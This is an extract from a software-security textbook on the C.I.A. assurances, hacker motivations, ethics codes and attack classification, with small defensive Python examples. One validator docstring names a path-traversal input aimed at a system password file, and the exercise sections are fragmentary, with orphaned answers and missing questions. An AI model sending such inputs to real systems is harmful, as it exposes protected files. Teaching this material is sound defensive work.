Security For Software Engineers
James Helfrich
CRC Press
Taylor & Francis Group
6000 Broken Sound Parkway NW, Suite 300
Boca Raton, FL 33487-2742
This book contains information obtained from authentic and highly regarded sources. Reasonable efforts have been made to publish reliable data and
information, but the author and publisher cannot assume responsibility for the validity of all materials or the consequences of their use. The authors and
publishers have attempted to trace the copyright holders of all material reproduced in this publication and apologize to copyright holders if permission
to publish in this form has not been obtained. If any copyright material has not been acknowledged please write and let us know so we may rectify in any
future reprint.
Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, reproduced, transmitted, or utilized in any form by any electronic,
mechanical, or other means, now known or hereafter invented, including photocopying, microfilming, and recording, or in any information storage or
retrieval system, without written permission from the publishers.
For permission to photocopy or use material electronically from this work, please access www.copyright.com or contact
the Copyright Clearance Center, Inc. (CCC), 222 Rosewood Drive, Danvers, MA 01923, 978-750-8400. CCC is a not-for-profit organization that provides
licenses and registration for a variety of users. For organizations that have been granted a photocopy license by the CCC, a separate system of payment
has been arranged.
Trademark Notice: Product or corporate names may be trademarks or registered trademarks, and are used only for identification and explanation
without intent to infringe.
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 00: Security for Software Engineers | 1
Chapter 00: Security for Software Engineers
If there is only one thing to learn from computer security, it is the three assurances. C.I.A. is infused in every
aspect of the security problem and is the foundation of this subject.
Computer security can be defined as providing confidentiality, integrity, and availability assurances to users or clients of information systems.

It is easy to see how computer security is an important component of our increasingly digital and interconnected lifestyle. It is less obvious to see how that plays out in the daily life of a software engineer. In fact, most of the traditional computer security activities are not performed by software engineers at all. These are handled by Information Technology (IT) personnel, performing such tasks as incident response (dealing with an attack that is underway), forensics (figuring out what happened after an attack has occurred), patching software (making sure that all the software on the system is hardened against known attacks), configuring virus scanners and firewalls (making sure the protection mechanisms in place are consistent with policy), and setting file permissions (ensuring that only the intended users have access to certain resources). We will only briefly touch upon these topics. What, then, does a software engineer do?
A software engineer needs to know how to engineer software so that confidentiality, integrity, and availability assurances can be made. This means that the design and implementation of computer systems must have the minimal number of vulnerabilities that an attacker can exploit. This imperative is the focus of this textbook: helping software engineers keep their jobs.
Examples
1. Q Classify the following as a confidentiality, integrity, or availability attack: The
attacker changes my account settings on Facebook so my pictures are visible to
the world.
A Integrity. The user’s data has been altered without permission. Note that the user still has confidentiality (no private data has been shared) and availability (we have no reason to believe that the home page is not accessible).
Exercises
1 From memory, define C.I.A. and explain in your own words what each
component means.
Problems
1 Debate topic: Who is more important in providing security assurances to users,
the IT professional or the software engineer? Justify your answer and provide
links to any relevant research.
Chapter 01: Roles
There is no need to memorize the various flavors of black hats and white hats. The purpose of this chapter
is to illustrate why people become black hats and what they are trying to accomplish. Only by understanding
their motives can white hats thwart their efforts and provide security assurances.
In an overly simplistic view of computer security, there are the bad guys (black
hats) and the good guys (white hats) competing for your computational
resources. One would be tempted to think of security as a faceoff between two
equally matched opponents. This analogy, however, does not hold. It is more
accurate to think of the black hats mounting a siege to spoil a castle’s treasures
and the white hats defending the castle. These names are derived from the classic
Western movies that dominated Hollywood fifty years ago. The bad guys were
readily identified by their black hats (and their tendency to end up in jail!) and the
good guys by their white hats (and their tendency to ride off into the sunset with
the pretty girl).
Black Hats
Black Hats: those who attempt to break the security of a system without permission.

Black hats are individuals who attempt to break the security of a system without legal permission. Legal permission is the most important part of that definition because it distinguishes a white hat sneaker from a black hat. With permission, a hacker is a sneaker. Without permission, he or she is a criminal.

As the common saying goes, “Keep your friends close. Keep your enemies closer.” In order to defend ourselves against the attacks of the adversary, it is essential to understand what makes him or her tick. This chapter addresses that need.
Through the years, there has been an evolution of the black hat community. The
first generation were hackers, those pushing the boundaries of what is possible.
They were motivated by pride and curiosity. This was the dominant archetype
until lucrative economic models existed where people could make a living
hacking. This led us to the second generation of black hats: criminals. With strong
economic motivations behind developing tools and techniques, considerable
advances were made. Perhaps not surprisingly, it did not take long for the big
players to recognize the power that hacking offered. This led to the current
generation of hackers: information warriors. They are motivated by power.
First Generation: black hats motivated by curiosity and pride.

As the definition implies, the goal of a hacker is not to steal or destroy. Rather, the goal is to see what is possible. There is one big difference between this first generation of black hats and the rest of the computer community: hackers have “non-traditional” personal ethical standards. In most cases, they do not believe that their activities are wrong. This is even true when real damage results from their behavior; they often blame the author of the vulnerability for the damage rather than themselves.
The first generation of black hats emerged when computers became available to every-day users in the 1970’s. It was not until the 1980’s that hacking became somewhat mainstream. Hackers filled the black hat ranks until the second generation became the dominant force in the late 1990’s.
Mentality of a Hacker
One great source for understanding the mentality of hackers is their writings. Probably the most widely read example is a small essay, commonly known as the Hacker’s Manifesto, written by the hacker Loyd Blankenship on January 8, 1986, shortly after his arrest.
The researcher Sarah Gordon performed a series of in-depth studies of hacking
communities in the early 1990’s and again a decade later (Gordon, 1999). Her
findings are among the most descriptive and illuminating of this first generation
of hackers. One of the key observations was that many of the virus writers were
socially immature, moving out of the virus writing stage as they matured socially
and had more stake in society. In other words, most “grew up.”
Labels
There are many labels associated with the first generation of hackers:
Phreak Dated term referring to a cracker of the phone system. Many consider phreaking the ancestor of modern hacking. Phreaks noticed that the phone company would send signals through the system by using tones at specific frequencies. For example, the signal indicating that a long-distance charge had been collected by a pay phone was the exact frequency of the Cap’n Crunch whistle included with a popular breakfast cereal.
Steve Jobs and Steve Wozniak, future co-founders of Apple Computer, built a
“blue-box” made from digital circuits designed to spoof the phone company
routing sequence by emitting certain tone frequencies. They sold their device for
$170 apiece. They were never arrested for their antics, though they were
questioned. While they were using a blue-box on a pay phone in a gas station,
a police officer questioned them. Steve successfully convinced the officer that
the blue-box was a music synthesizer.
Cracker One who enjoys the challenge of black hat activities. Crackers would often break
into school computers, government networks, or even bank computers just to
see if it could be done. They would then write about their exploits in cracker
journals such as 2600 or Phrack. We generally avoid the term “Hacker” because
it could also mean someone who has good intentions.
Cyberpunk A contemporary combination of hacker, cracker, and phreak. The writings of
cyberpunks often carry an air of counter-culture, rebelling against authority and
main stream lifestyles. An example would be Loyd Blankenship, the author of the
Hacker’s Manifesto.
Thrill Seeker A curious individual wanting to see how far he or she can go. Often the actions
of thrill seekers are not premeditated or even intentional.
A 15-year-old high school student named Rich Skrenta was in the habit of
cracking the copy-protection mechanism on computer games and distributing
them to his friends. Just for fun, he often attached self-replicating code to these
programs that would play tricks on his friends. One of these programs was
called “Elk Cloner” which would display a poem on his victim’s computer
screen: “Elk Cloner: The program with a personality.”
Demigod Experienced cracker, typically producing tools and describing techniques for the use of others. Though many are motivated by status within the community, others simply want to advance the cause. Most demigods use an assumed name when describing their exploits.
Many consider Gary McKinnon the most famous and successful demigod of
modern times. In one 24-hour period, he shut down the Washington D.C.
network of the Department of Defense.
Script Kiddie Short on skill but long on desire; often use tools developed by more experienced
demigods. However, because the tools developed by demigods are often so
well-developed, script kiddies can cause significant damage.
A 15-year-old boy living in Northern Ireland was arrested in October 2015 for
exploiting a known vulnerability in the communication company TalkTalk
Telecom Group PLC. After obtaining confidential information, he attempted an
extortion racket by demanding payment for not publicly releasing the
information.
Technological Hacker Tries to advance technology by exploiting defects. They see their activities as
being part of the Internet’s immune system, fighting against inferior or
unworthy software/systems.
Grey Hats: first generation black hats motivated by the challenge of finding vulnerabilities and increasing system security.

There is one additional important member of this category. Recall that black hats are the “bad guys” and operate outside the law, whereas white hats are the “good guys” and operate to protect the interests of legitimate users. What do you call an individual who operates outside the law but to protect legitimate users? The answer is “grey hats.”
Are grey hats a third category, distinct from white hats and black hats alike?
The answer is “no.” They operate outside the law and are thus black hats.
However they are motivated by curiosity and challenge: to see if they can find
vulnerabilities. For this reason, they are members of the first generation.
Reach It is possible to reach large numbers of potential victims. This means hacking
can be profitable with only a small success rate.
Shane Atkinson sent an average of 100 million SPAM messages a day in 2003.
This was accomplished with only 0.1% - 0.7% of his attempts to send a given
message being successful, and only 0.1% - 0.9% of those were read by humans.
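Even at the low end of these rates, the arithmetic shows why reach matters. A quick back-of-the-envelope sketch (using only the figures quoted above; any revenue figure would be a further assumption, so none is given):

```python
# Figures quoted for the 2003 SPAM operation, taking the low end of each
# range. Even then, roughly a hundred humans read the message every day.
messages_sent = 100_000_000   # messages sent per day
delivery_rate = 0.001         # 0.1% of attempts successfully sent
read_rate = 0.001             # 0.1% of delivered messages read by humans

read_per_day = messages_sent * delivery_rate * read_rate  # roughly 100
print(read_per_day)
```

With virtually zero marginal cost per message, even a minuscule success rate leaves the attacker with a steady stream of potential victims.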
Each of these has convinced many of the first generation of hackers to continue
with the work they enjoy rather than finding a more socially acceptable job.
Organized Cybercrime
With the advent of cutting-edge malware tools, viable business models, and little
risk of law enforcement interference, it was not long before ad-hoc cybercrime
migrated into sophisticated criminal organizations similar to the mafia. While
organized cybercrime originated in Russia with the Russian Business Network
(RBN), many similar organizations have appeared in other countries (Ben-Itzhak,
2009).
Labels
There are many labels associated with the second generation of hackers. A
common underlying theme is their monetary motivation.
Economic Hacker Generic term used to describe all individuals who commit crimes using
computers for personal gain. In other words, this term is interchangeable with
“second generation black hat.”
Criminal A criminal is someone who steals or blackmails for gain. The only difference
between a common thief and a black hat criminal is the role of computers in the
crime. It is relatively rare for a criminal to move from the physical world (such
as robbing banks or stealing cars) to the virtual world (such as breaking into
networks or stealing credit card numbers from databases). The reason is that
the skills necessary to commit cybercrime could also be used in a high-paying
job. In other words, most black hat criminals pursue that line of work because
they have nothing to lose or they feel they can be better paid than they would
in a white hat role.
Insider Use their specialized knowledge and insider access to wreak havoc. Inside
attacks are difficult to protect against because their behavior is difficult to
distinguish from legitimate work they normally would be doing.
Late in the 2016 presidential election, e-mail belonging to Democratic candidate Hillary Clinton’s campaign was hacked. As a result, tens of thousands of private e-mails were posted on the site WikiLeaks. Investigators attributed the breach to Russian hackers attempting to sway the presidential election, though some commentators argued the leak was an inside job.
Spacker One who finds vulnerabilities and leverages exploits for the purpose of sending SPAM.
To this day, SPAM is one of the largest economic motivations for black hats. A
skilled SPAMMER can make tens of thousands of dollars in a single SPAM run.
Today SPAMMERS are far more specialized than they were 20 years ago. Some
specialize in stealing e-mail lists. Others specialize in building and maintaining
botnets that send the messages. Finally, others specialize in creating the
messages designed to sell a given product or service. All of these would be
considered spackers.
GRUM (a.k.a. Tedroo), taken down in 2012, was one of the largest SPAM botnets of its era. With 600,000 compromised computers in the network, it sent 40 billion emails a day. At the time, this was about 25% of the total SPAM generated worldwide.
Corporate Raider Looks for trade secrets or other privileged industrial information for the
purpose of exploiting the information for profit. Some corporate raiders are
employed by organizations. It is more common to find freelancers who sell
information to interested parties. Corporate raiders often work across country
boundaries to protect themselves from arrest. China, Ukraine, and Russia are
hot-beds for corporate raiders today.
Codan is an Australian firm that sells, among other things, metal detectors. In
2011, Chinese hackers were successful in stealing the design of their top-selling
metal detector. A few months later, exact copies of this metal detector were
being sold world-wide for a fraction of the cost, causing serious long-term
damage to Codan. Their annual profits fell from $45 million to $9.2 million in
one year. Due to complications in computer crime cases and difficulties
pursuing criminals across national borders, the Australian government was
unable to protect Codan.
Terrorist Similar to a governmental hacker except not directly sponsored by a recognized
government. Often terrorist activities are covertly coordinated by a government
but frequently they operate independently. Terrorists are similar to Hacktivists;
the terms are often used interchangeably.
On the 24th of March, 2016, Andrew Auernheimer (a.k.a. Weev) hijacked
thousands of web-connected printers to spread neo-Nazi propaganda. This
hack was apparently accomplished with a single line of a Bash script.
White Hats
While the role of white hats in the computer security space may be varied, two
common characteristics are shared with most white hats:
Ethics Their activity is bounded by rules, laws, and a code of ethics.
Defense They play on the defensive side. Any activity in an offensive role can be traced
to strengthening the defense.
The distinguishing characteristic of white hats is their work to uphold the law and
provide security assurances to users. For the most part, this puts them in the
defensive role. There are exceptions, however. Some police white hats actively
attack the computer systems of known criminals.
Ethics
One of the fundamental differences between a white hat and a black hat is that white hats operate under a code of ethics. Perhaps this statement needs to be made more carefully: even communal black hats have a code of ethics. Those ethics, however, may lie somewhat outside societal norms.

The Code of Ethics defined by (ISC)² is widely adopted by white hats around the world. While the principles are broadly defined and laced with subjective terms, they provide a convenient and time-tested yardstick to measure the ethical implications of computing activities ((ISC)², 2017).
Protect: White hats have the responsibility to protect society from computer threats. They do this by protecting computer systems from being compromised by attackers. They also have the responsibility to teach people how to safely use computers to help prevent attacks.

Act Honorably: They must act honorably by telling the truth all the time. They have the responsibility to always inform those who they work for about what they are doing.

Provide Service: They should give prudent advice and treat everyone else fairly. White hats should provide diligent and competent service.

Advance the Profession: They should show respect for the trust and privileges that they receive. They should only give service in areas in which they are competent. They should avoid conflicts of interest or the appearance thereof.
The ACM (Association for Computing Machinery) adopted a more verbose set of
guidelines, consisting of three imperatives (Moral, Professional, and
Organizational Leadership) split into 22 individual components (ACM, 1992).
Labels
There are several broad classifications of white hats: decision makers, IT
professionals, and software engineers.
Political leaders People who create laws surrounding computer resources can be considered
white hats. Typically they are not as knowledgeable about technical issues as
other white hats, but they are often informed by experts in the industry.
Law Enforcement The police, FBI, and even the military are white hats as they enforce the laws
and edicts of political leaders.
Executives Fulfilling basically the same role as political leaders, executives make policy
decisions for organizations. In this way, they serve as white hats.
Educators Teachers, workshop leaders, and authors are an important class of white hats,
serving to inform people about security issues and help people be more security
aware. Parents also fall into this category.
Journalists Reporters, columnists, and bloggers fulfill a similar role as educators.
Administrator A person who manages a network to keep computers on the network secure.
Software Engineer An individual who creates software for users and clients that provides confidentiality, integrity, and availability assurances.
Sneaker An individual tasked with assessing the security of a given system. Sneakers use
black hat tools and techniques to attempt to penetrate a system in an effort to
find vulnerabilities.
Penetration Tester An individual tasked with probing external interfaces to a web server for the
purpose of identifying publicly available information and estimating the overall
security level of the system.
Tiger Team A group of individuals conducting a coordinated analysis of the security of a system. Some tiger teams function similarly to sneakers while others also analyze internal tools and procedures.
The final category of white hats is software engineers. Their job is to write code
that is resistant to attacks. Every software engineer needs to be familiar with
security issues and think about ways to minimize vulnerabilities. This is because
it is not always apparent when a given part of a program may find itself in a
security-critical situation.
Probably the most common security activity of a software engineer is to write code that is free of vulnerabilities. A software vulnerability is usually a bug resulting in behavior different than the programmer’s intent. If the resulting behavior compromises the user’s confidentiality, integrity, or availability, then a security vulnerability exists. Thus, vulnerabilities are special forms of bugs. For the most part, standard software engineering practices avoid these bugs.
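As an illustration (a hypothetical sketch; the function, directory, and file names are invented for this example, not drawn from the text), consider a routine meant to return reports from a single fixed directory. Failing to validate the requested name is an ordinary bug, but because it lets a caller read files outside that directory, it is also a confidentiality vulnerability:

```python
import os

REPORT_DIR = "/srv/reports"  # hypothetical report directory

def resolve_report_path(name: str) -> str:
    """Return the absolute path for a report, refusing names such as
    "../../etc/passwd" that would escape REPORT_DIR."""
    path = os.path.realpath(os.path.join(REPORT_DIR, name))
    if not path.startswith(REPORT_DIR + os.sep):
        raise ValueError("invalid report name: " + name)
    return path

def read_report(name: str) -> str:
    # The buggy version would be open(os.path.join(REPORT_DIR, name)):
    # behavior different from the programmer's intent (serving only files
    # under REPORT_DIR) that also compromises confidentiality.
    with open(resolve_report_path(name)) as f:
        return f.read()
```

To the programmer, the buggy version looks like a file-handling detail; to an attacker, it is a read-anything primitive. This is why it is not always apparent which code is security-critical.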
A second activity is to locate vulnerabilities already existing in a given codebase.
This involves locating the security-critical code and looking for bugs known to
cause problems. As you can well imagine, this is a tedious task.
A final activity is to integrate security features into code. This may include
authentication mechanisms or encryption algorithms. In each case, the feature
must be integrated correctly for it to function properly. The software engineer
needs to have a deep understanding of these features to do this job properly.
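As a small sketch of what “integrated correctly” can mean (using Python’s standard library; the iteration count and salt size are illustrative assumptions, not recommendations from the text), consider storing and checking a password. Each piece, a random per-user salt, a deliberately slow hash, and a constant-time comparison, must be present for the feature to actually provide its assurance:

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    # A fresh random salt per user defeats precomputed-table attacks.
    if salt is None:
        salt = os.urandom(16)
    # PBKDF2 is deliberately slow, limiting offline guessing speed.
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    _, candidate = hash_password(password, salt)
    # compare_digest runs in constant time, avoiding a timing side channel.
    return hmac.compare_digest(candidate, digest)
```

A common integration mistake is comparing digests with `==` or reusing a single site-wide salt; either undermines the assurance even though the underlying cryptographic primitive is sound.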
Attacker’s Advantage
Black hats and white hats thus have different roles and are typically involved in
different activities. The black hats (the attackers) have innate advantages over
the white hats (the defenders). This advantage persists whether the attackers are
an invading army or the cyber mafia. The attacker’s advantage has four parts
(Howard & LeBlanc, 2003):
The defender must defend all points; the attacker can choose the weakest point. Attackers are free to choose the point of attack. This is typically the weakest or most convenient point in the defense system. This forces the defender to evenly distribute resources across the entire perimeter. Otherwise, the attacker will choose the point where the defensive forces are weakest. The Germans exploited this advantage in WWII. Rather than invading France through the heavily fortified Maginot Line (spanning the entire France-Germany border), they went through the lightly defended Low Countries, thereby completing the campaign in six weeks with minimal casualties.
The defender can defend only against known attacks; the attacker can probe for unknown vulnerabilities. While the many attack vectors are generally known by both the attackers and the defenders, there exists a much larger set of yet-to-be-discovered attack vectors. It is highly unlikely that both the attackers and the defenders will make a discovery about the same novel attack at the same time. Thus, exploiting previously unknown (novel) attack vectors is likely to be successful for attackers, and fixing novel attack vectors is likely to have no impact on attackers. Back to our WWII examples, the Germans created a novel attack vector with the V2 ballistic missile. The world had never seen such a weapon before, and the British were completely unable to defend against it.
The defender must be constantly vigilant; the attacker can strike at will. Similar to the “weakest point” advantage, the defender cannot let down his defenses at any point in time, lest the enemy choose that moment to attack. This advantage was exploited in WWII when the Japanese launched a surprise attack against the United States at Pearl Harbor. The defending Army and Navy “stood down” on Sunday morning with the minimum complement of men on duty. The attacking Japanese airplanes met no resistance on their approach to the target and lost little during the ensuing attack.
The defender must play by the rules; the attacker can play dirty. The defender’s activities are known and open to the scrutiny of the public. The attacker’s activities, on the other hand, need to be secretive or the law would prosecute them. This means defender activities are constrained by the law while attackers are free to use any means necessary to achieve their objectives. In the months leading up to WWII, the defending Allies contended with Hitler’s aggression using diplomacy within the framework of international law. Hitler, realizing the act of invasion was already against the law, was free to pursue any course he chose to achieve his objectives.
Examples
1. Q Classify the following example as a white hat or a black hat: An Islamic extremist
sponsored by ISIS decides to deface the CIA website.
2. Q Classify the following example as a white hat or a black hat: A parent cracks their
child’s password to view Facebook posts.
A White Hat - Executives. Parents are white hats because they are operating
within their legal rights to monitor the activities of their underage children. They
are operating in a similar role as an executive if you consider the family unit as
an “organization.” Since it is the parent’s responsibility to “make policy
decisions,” they are executives.
A The short answer is “No” because the act of breaking the law makes the
individual a black hat. However, there are infrequent cases where following the
law is an illegal act (such as a soldier being ordered to kill an innocent citizen)
and equally infrequent cases where failing to act due to law is an immoral act
(such as not jay-walking to help a man having a heart attack across the street).
In limited situations such as these, breaking the law does not make someone a
black hat.
A Second generation. Frank was essentially a thief, using his hacking skills for
financial benefit.
A First generation. Robert wanted to see if his creation would come to life. He had
no economic or political stake in the outcome.
follows that the Department of Defense needs to have a cyber army to fulfill its
objectives.
7. Q Find a recent malware outbreak reported on the news or by a security firm. Was
this malware authored by a 1st, 2nd, or 3rd generation black hat?
8. Q A police officer decides to go “under the radar” for an hour and patrol a
neighborhood outside his jurisdiction. Which aspect of the Code of Ethics did he
break?
A Act Honorably. By hiding his activities, he is failing to “tell the truth at all times”
and he is failing to “inform those for whom [he] work[s] for what [he is] doing.”
A Protect. “White hats have the responsibility to protect society.” This goes
beyond the boundaries of the job title. Doctors have similar responsibilities,
being required to provide service regardless of whether they are on duty.
10. Q A small business owner has noticed a string of authentication attempts from the
same IP address. Looking at the logs, it is clear that someone is trying to guess
his password. Is it ethical for this owner to launch a counter-attack and shut
down the computer on this IP address?
A No. According to the code of ethics, white hats are to act honorably. Launching
an illegal attack is not an honorable action. This is especially true if the owner is
not given a chance to stop the attack and if the police are not informed. That
being said, if the police give permission or the owner of the IP address or ISP
(Internet Service Provider) gives permission, then the counter-attack is ethical.
Exercises
1 From memory, list and define the attacker’s advantage.
3 Up until the late 1990’s, what were the most common reasons for writing a
piece of malware?
5 What generation of hacker is Rich Skrenta, the author of the first documented
virus (Elk Cloner) released into the world?
I had been playing jokes on schoolmates by altering copies of pirated games to
self-destruct after a number of plays. I'd give out a new game, they'd get
hooked, but then the game would stop working with a snickering comment
from me on the screen (9th grade humor at work here). I hit on the idea to leave
a residue in the operating system of the school’s Apple II. The next user who
came by, if they didn't do a clean reboot with their own disk, could then be
touched by the code I left behind. I realized that a self-propagating program
could be written, but rather than blowing up quickly, to the extent that it laid
low it could spread beyond the first person to others as well. I coded up Elk
Cloner and gave it a good start in life by infecting everyone’s disks I could get
my hands on. (Skrenta, 2007)
Problems
1 If there were such a thing as a defender’s advantage (analogous to the attacker’s
advantage), what would it be?
2 Debate topic: For most of human history, “ethics” and “warfare” were seldom
mentioned in the same sentence. This changed during medieval times as
chivalry and honor became important attributes for knights and other types of
soldiers. Today, the Geneva Convention and similar rules govern modern
warfare to a degree. The question remains, should ethics be a consideration in
computer security or should we just strive to win the war?
6 Find a recent malware outbreak reported on the news or by a security firm. Was
this malware authored by a 1st, 2nd, or 3rd generation black hat?
7 If you were building an e-commerce web site, what could you do to discourage
the 1st generation of black hats?
8 If you were building an e-commerce web site, what could you do to discourage
the 2nd generation of black hats?
9 Please find and read the “Hacker’s Manifesto.” What can we learn from this
article?
10 Do you think hackers are the Internet immune system, or do you think we need
another immune system?
11 Should law enforcement officers be allowed to use black hat techniques for the
purpose of providing security assurances to the public?
12 Robin Hood was a mythical figure known for “robbing from the rich and giving
to the poor.” Robin Hood hackers, on the other hand, probe web sites without
the knowledge or permission of the owner for the purpose of revealing their
findings to the owner. Reactions to these activities are mixed. Some site
managers are grateful for the provided services while others press charges. Do
you feel that Robin Hooders are white hats or black hats?
13 A hacker organization called “Anonymous” has been formed for the express
purpose of conducting attacks on the Internet. Are their actions and methods
justified?
14 While law enforcement agencies are called to protect citizens from the
exploits of the lawless, it is still the responsibility of the individual to take basic
steps to protect himself. This responsibility extends to the times when the
government itself does not fulfill its responsibilities and no longer serves its
constituents. Hansen claims it is the responsibility of a patriot to “overthrow
duly constituted authorities who betray the public trust.” Do you agree?
16 A few years back, a hacker found a way to discover the list of people accepted
to the Harvard MBA program. Do you feel that the hacker broke a law or acted
immorally?
Unit 1: Attack Vectors
Chapter 02: Classification of Attacks
The essential skill of this chapter is to recognize the many different ways an attack can be manifested. Only
by understanding all of these attack vectors can we take steps to prevent them.
The first step in writing secure code is to understand how black hats exploit
vulnerabilities. For this to be done, a few terms need to be defined.
Asset An asset is something of value that a defender wishes to protect and the attacker
wishes to possess. Obvious assets include credit-card numbers or passwords.
Other assets include network bandwidth, processing power, or privileges. A
user’s reputation can even be considered an asset.
Threat A threat is a potential event causing the asset to devalue for the defender or
come into the possession of the attacker. Common threats to an asset include
transfer of ownership, destruction of the asset, disclosure, or corruption.
Vulnerability A threat to an asset cannot come to pass unless there exists a weakness in the
system protecting it. This weakness is called a vulnerability. It is the role of the
software engineer to minimize vulnerabilities by creating software that is free of
defects and uses the most reliable asset protection mechanisms available.
Risk A risk is a vulnerability paired with a threat. If the means to compromise an asset
exists (threat) and insufficient protection mechanisms exist to prevent this from
occurring (vulnerability), then the possibility exists that an attack may happen
(risk).
Attack An attack is a risk realized. This occurs when an attacker has the knowledge, will,
and means to exploit a risk. Of course not all risks result in an attack, but all
attacks are the result of a risk being exploited.
Mitigation Mitigation is the process of the defender reducing the risk of an attack. Attacks
are not mitigated; instead risks are mitigated. There are two fundamental ways
this can be accomplished: by reducing vulnerabilities or by devaluing assets.
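These definitions chain together: a risk exists only when a threat is paired with a vulnerability that exposes an asset. A minimal sketch in Python can make the relationships concrete; the class and field names below are illustrative, not the chapter’s.

```python
from dataclasses import dataclass

@dataclass
class Asset:
    name: str
    value: int            # relative worth to the defender

@dataclass
class Threat:
    description: str      # potential event devaluing the asset

@dataclass
class Vulnerability:
    description: str      # weakness that lets the threat come to pass

@dataclass
class Risk:
    """A risk is a vulnerability paired with a threat against an asset."""
    asset: Asset
    threat: Threat
    vulnerability: Vulnerability

    def mitigate_by_devaluing(self) -> None:
        # One of the two mitigation strategies named above:
        # reduce the value of the asset itself.
        self.asset.value = 0

grade = Asset("physics grade", value=10)
risk = Risk(grade,
            Threat("alter the grade on the school's server"),
            Vulnerability("password written on a post-it note"))
```

An attack, in this model, would be an actor actually exercising a `Risk`; mitigation works on the `Risk` object, never on the attack itself.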
An attack vector is the path an attacker follows to reach an asset. This may include
more than one vulnerability or more than one asset. To see how these concepts
are related, consider the following scenario: a malicious student wishes to change
his physics grade on the school’s server. First we start with the asset: the grade.
Next we consider the threat: damage the integrity of the grade by altering the
data on the school’s server. The intent of the system is for this threat to be
impossible. If a vulnerability in the system exists, then the threat is possible. This
may happen if one of the administrators uses unsafe password handling
procedures. Consider the case where one of the employees in the registrar’s
office keeps his password written on a post-it note under his keyboard. Now we
have a risk: a malicious student could obtain that password and impersonate the
administrator. This leads us to the attack. Our malicious student learns of the
post-it note and, when no one is looking, writes down the password. The next day
he logs in as the administrator, navigates to the change-grade form, and alters
the grade. Fortunately, an alert teacher notices that the failing physics grade was
changed to an ‘A’. With some work, the source of the problem was identified.
Mitigation of this attack vector is then to create a university policy where no
passwords are to be written down by employees.
Classification of Attacks
Software engineers are concerned about attack vectors because they illustrate
the types of vulnerabilities that could yield an asset being compromised. An
important part of this process is classification of possible attacks. There are three
axes or dimensions of this classification process: the state of the asset, the type
of assurance the asset offers, and the type of vulnerability necessary for an attack
to be carried out. These three axes are collectively called the McCumber Cube
(McCumber, 1991).
Classification schemes are useful not only for precisely identifying a given attack
that has transpired or is currently underway (an activity more in line with the work
of an I.T. professional than a software engineer), but also for brainstorming about
different attack vectors that may be possible at a given point in the computing system.
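The three axes can be enumerated directly, which is one way to drive the brainstorming exercise: every cell of the cube is a candidate attack vector. This excerpt does not list the members of the third (vulnerability/safeguard) axis, so the members below follow the commonly cited McCumber formulation and are an assumption.

```python
from enum import Enum
from itertools import product

class Assurance(Enum):          # first axis: type of asset/assurance
    CONFIDENTIALITY = "confidentiality"
    INTEGRITY = "integrity"
    AVAILABILITY = "availability"

class State(Enum):              # second axis: state of the information
    STORAGE = "storage"
    TRANSMISSION = "transmission"
    PROCESSING = "processing"

class Safeguard(Enum):          # third axis: assumed members (technology,
    TECHNOLOGY = "technology"   # policy & practice, human factors), as in
    POLICY = "policy"           # the usual McCumber Cube presentation
    HUMAN_FACTORS = "human factors"

# Each combination is one cell of the cube: 3 x 3 x 3 = 27 cells
# to consider when classifying or brainstorming attacks.
cells = list(product(Assurance, State, Safeguard))
```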
[Figure 02.1: McCumber Cube]
Perhaps it is best to explain these attributes by example. Consider a bank
attempting to prevent a thief from misusing client assets (money in this case).
The thief has a wide range of options available to him when contemplating theft
of the assets.
Type of Asset
The asset face of the McCumber Cube maps directly to the three security
assurances. While we analyze these independently, it is important to realize that
most user assets are a combination of the three.
Confidentiality
Confidentiality is the assurance that the software system will keep the user’s
private data private. This could also be described as the assurance that only the
owner of an asset can specify how the asset is viewed.
Attacks on confidentiality are called disclosure attacks. If an individual views an
asset contrary to the wish of the owner, then a confidentiality breach or a
disclosure attack has occurred.
Returning to the bank example, confidentiality assures the client that his account
balance will not be disclosed to the public. The attacker does not need to steal the
client’s money to attack it; he can simply post the client’s bank statement on the
front door of the bank.
Integrity
Integrity is the assurance that the software system will preserve the user’s data. It
is a promise that the data will not be destroyed, will not be corrupted accidentally,
and will not be altered maliciously. In other words, the user’s asset will remain in
the same condition in which the user left it. In this digital age, it is difficult to make
integrity guarantees. Instead, the best we can hope for is to detect unauthorized
tampering.
Attacks on integrity are called alteration attacks. If a change has been made to
the user’s data contrary to his will, then integrity has been compromised or an
alteration attack has occurred.
In the banking example, there are many ways in which the attacker can launch
an alteration attack. He could steal the contents of the client’s safety deposit box,
he could alter the password to the client’s account, or he could deface the bank’s
website. In each case, the state of one of the bank’s assets has changed in a way
that was contrary to the bank’s will.
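Since integrity usually cannot be guaranteed outright, detection is the practical goal. A standard technique is to store a keyed digest (an HMAC) alongside the data and recompute it on every read; any alteration changes the digest. The key below is a placeholder, and key management is out of scope for this sketch.

```python
import hashlib
import hmac

KEY = b"placeholder-secret-key"   # assumed; real keys come from a key store

def tag(data: bytes) -> str:
    """Compute a keyed digest to store alongside the data."""
    return hmac.new(KEY, data, hashlib.sha256).hexdigest()

def unaltered(data: bytes, stored_tag: str) -> bool:
    """True if the data still matches the digest recorded for it."""
    # compare_digest avoids leaking information through timing.
    return hmac.compare_digest(tag(data), stored_tag)

record = b"balance=1000"
record_tag = tag(record)
```

Verifying `record` against `record_tag` succeeds, while a tampered copy such as `b"balance=9000"` fails the check, which is exactly the detection the text describes.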
Availability
Availability is the assurance that the user can access his informational,
computational, or communication resources when he requires them. As with the
integrity assurance, this includes resistance to availability problems stemming
from software defects as well as denial attacks from individuals with malicious
intent.
Attacks on availability are called denial attacks, also known as denial of service
(D.o.S.) attacks. If an attacker is able to disrupt the normal operation of a system
in such a way that the availability of system resources is impacted, then a denial
attack has occurred.
In the banking example, there are many ways that an attacker can launch a denial
attack. He could put sleeping gas in the ventilation system temporarily
incapacitating the employees, he could get a hundred of his friends to flash-mob
the bank thereby consuming all the time and attention of the clerks, or he could
detonate a bomb in the building destroying everything inside. In other words,
denial attacks can be inconveniences, temporary outages, or permanent outages.
S.T.R.I.D.E.
The S.T.R.I.D.E. taxonomy was developed in 2002 by Microsoft Corp. to enable
software engineers to more accurately and systematically identify defects in code
they are evaluating. The S.T.R.I.D.E. model is an elaboration of the more familiar
C.I.A. model but facilitates more accurate identification of security assets. There
are six components of S.T.R.I.D.E. (Howard & LeBlanc, 2003).
